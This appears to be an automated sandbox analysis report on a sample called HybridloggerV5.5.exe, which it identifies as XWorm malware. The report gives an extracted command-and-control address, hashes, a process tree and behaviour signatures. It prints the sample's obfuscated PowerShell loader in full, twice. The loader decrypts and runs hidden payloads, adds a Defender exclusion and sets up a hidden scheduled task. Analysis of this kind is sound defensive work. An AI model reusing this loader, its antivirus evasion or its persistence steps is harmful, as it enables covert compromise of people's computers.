Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
123s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
28/02/2025, 05:14
Static task
static1
Behavioral task
behavioral1
Sample
HybridloggerV5.5.exe
Resource
win7-20240903-en
General
-
Target
HybridloggerV5.5.exe
-
Size
937KB
-
MD5
c9314841cdbf8522e9ee925039d3bfb7
-
SHA1
1b851459626862fdae6bdc0dd30aadf7a0f905ee
-
SHA256
9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
-
SHA512
fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
-
SSDEEP
24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM
Malware Config
Extracted
xworm
193.161.193.99:24469
-
Install_directory
%Temp%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2720-53-0x0000025E1BB60000-0x0000025E1BB76000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 25 2720 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 744 powershell.exe 4904 powershell.exe 2720 powershell.exe 744 powershell.exe 2720 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation HybridloggerV5.5.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 744 powershell.exe 744 powershell.exe 4904 powershell.exe 4904 powershell.exe 4904 powershell.exe 2720 powershell.exe 2720 powershell.exe 2720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 744 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeIncreaseQuotaPrivilege 4904 powershell.exe Token: SeSecurityPrivilege 4904 powershell.exe Token: SeTakeOwnershipPrivilege 4904 powershell.exe Token: SeLoadDriverPrivilege 4904 powershell.exe Token: SeSystemProfilePrivilege 4904 powershell.exe Token: SeSystemtimePrivilege 4904 powershell.exe Token: SeProfSingleProcessPrivilege 4904 powershell.exe Token: SeIncBasePriorityPrivilege 4904 powershell.exe Token: SeCreatePagefilePrivilege 4904 powershell.exe Token: SeBackupPrivilege 4904 powershell.exe Token: SeRestorePrivilege 4904 powershell.exe Token: SeShutdownPrivilege 4904 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeSystemEnvironmentPrivilege 4904 powershell.exe Token: SeRemoteShutdownPrivilege 4904 powershell.exe Token: SeUndockPrivilege 4904 powershell.exe Token: SeManageVolumePrivilege 4904 powershell.exe Token: 33 4904 powershell.exe Token: 34 4904 powershell.exe Token: 35 4904 powershell.exe Token: 36 4904 powershell.exe Token: SeIncreaseQuotaPrivilege 4904 powershell.exe Token: SeSecurityPrivilege 4904 powershell.exe Token: SeTakeOwnershipPrivilege 4904 powershell.exe Token: SeLoadDriverPrivilege 4904 powershell.exe Token: SeSystemProfilePrivilege 4904 powershell.exe Token: SeSystemtimePrivilege 4904 powershell.exe Token: SeProfSingleProcessPrivilege 4904 powershell.exe Token: SeIncBasePriorityPrivilege 4904 powershell.exe Token: SeCreatePagefilePrivilege 4904 powershell.exe Token: SeBackupPrivilege 4904 powershell.exe Token: SeRestorePrivilege 4904 powershell.exe Token: SeShutdownPrivilege 4904 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeSystemEnvironmentPrivilege 4904 powershell.exe Token: SeRemoteShutdownPrivilege 4904 powershell.exe Token: SeUndockPrivilege 4904 powershell.exe Token: SeManageVolumePrivilege 4904 powershell.exe Token: 33 4904 powershell.exe Token: 34 4904 powershell.exe Token: 35 4904 powershell.exe Token: 36 4904 powershell.exe Token: SeIncreaseQuotaPrivilege 4904 powershell.exe Token: SeSecurityPrivilege 4904 powershell.exe Token: SeTakeOwnershipPrivilege 4904 powershell.exe Token: SeLoadDriverPrivilege 4904 powershell.exe Token: SeSystemProfilePrivilege 4904 powershell.exe Token: SeSystemtimePrivilege 4904 powershell.exe Token: SeProfSingleProcessPrivilege 4904 powershell.exe Token: SeIncBasePriorityPrivilege 4904 powershell.exe Token: SeCreatePagefilePrivilege 4904 powershell.exe Token: SeBackupPrivilege 4904 powershell.exe Token: SeRestorePrivilege 4904 powershell.exe Token: SeShutdownPrivilege 4904 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeSystemEnvironmentPrivilege 4904 powershell.exe Token: SeRemoteShutdownPrivilege 4904 powershell.exe Token: SeUndockPrivilege 4904 powershell.exe Token: SeManageVolumePrivilege 4904 powershell.exe Token: 33 4904 powershell.exe Token: 34 4904 powershell.exe Token: 35 4904 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1984 wrote to memory of 1464 1984 HybridloggerV5.5.exe 88 PID 1984 wrote to memory of 1464 1984 HybridloggerV5.5.exe 88 PID 1984 wrote to memory of 2952 1984 HybridloggerV5.5.exe 90 PID 1984 wrote to memory of 2952 1984 HybridloggerV5.5.exe 90 PID 1464 wrote to memory of 1548 1464 cmd.exe 92 PID 1464 wrote to memory of 1548 1464 cmd.exe 92 PID 2952 wrote to memory of 548 2952 cmd.exe 93 PID 2952 wrote to memory of 548 2952 cmd.exe 93 PID 548 wrote to memory of 2904 548 net.exe 94 PID 548 wrote to memory of 2904 548 net.exe 94 PID 2952 wrote to memory of 744 2952 cmd.exe 97 PID 2952 wrote to memory of 744 2952 cmd.exe 97 PID 744 wrote to memory of 4904 744 powershell.exe 101 PID 744 wrote to memory of 4904 744 powershell.exe 101 PID 744 wrote to memory of 5020 744 powershell.exe 103 PID 744 wrote to memory of 5020 744 powershell.exe 103 PID 5020 wrote to memory of 4624 5020 WScript.exe 104 PID 5020 wrote to memory of 4624 5020 WScript.exe 104 PID 4624 wrote to memory of 1352 4624 cmd.exe 107 PID 4624 wrote to memory of 1352 4624 cmd.exe 107 PID 1352 wrote to memory of 4748 1352 net.exe 108 PID 1352 wrote to memory of 4748 1352 net.exe 108 PID 4624 wrote to memory of 2720 4624 cmd.exe 109 PID 4624 wrote to memory of 2720 4624 cmd.exe 109 PID 1464 wrote to memory of 2336 1464 cmd.exe 119 PID 1464 wrote to memory of 2336 1464 cmd.exe 119 PID 1464 wrote to memory of 920 1464 cmd.exe 120 PID 1464 wrote to memory of 920 1464 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1548
-
-
C:\Windows\system32\findstr.exefindstr /C:"asd" banned_users.txt3⤵PID:2336
-
-
C:\Windows\system32\findstr.exefindstr /C:"asd asd" users.txt3⤵PID:920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:2904
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_120_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_120.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_120.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_120.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:4748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_120.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2720
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
12KB
MD589a22d3791ca38666c8144725a74497d
SHA196b672089a3c783e4dd27e8da7c0cc1245d55cfd
SHA2569326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94
SHA5126b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e
-
Filesize
910KB
MD572ecd938d114e246eeebc8ae430fc2e9
SHA19ece59be22ceadcb3951093483cc69a76658801d
SHA2564eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65
SHA512d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10B
MD5bebbe3f3e6a9600be7982006daab2e95
SHA1bc6ea02ee0160343925db6136ab1a76a314411bb
SHA256afc1cd0ffdfd94078823c53c72714c91b21b5990d335ef5b2128f613ce3432e5
SHA512872855b832566763b4d825e985cc518219d7b97d845aff07a76e05e454f707c3245f808515658ff56c879e50e58381ebdf6509681a0d9cf9b8c0147cbb3b6da1
-
Filesize
115B
MD538ecd8a0fb1393c7394095882a71f131
SHA1f17201d2d2e00167e7786766b2da546b5e50c028
SHA2561ea700303afd0e245e8342593f0da8c65ddad1509fd7b6e4401277079b227d61
SHA512f377054e2b68b07d39bdf2c9d33ce0565b9b1dbddc3631af7a0d8624fd58df437c3671b507f4942a1a444de7edf86c4b7ab150f21f1807b064e358ebd3645573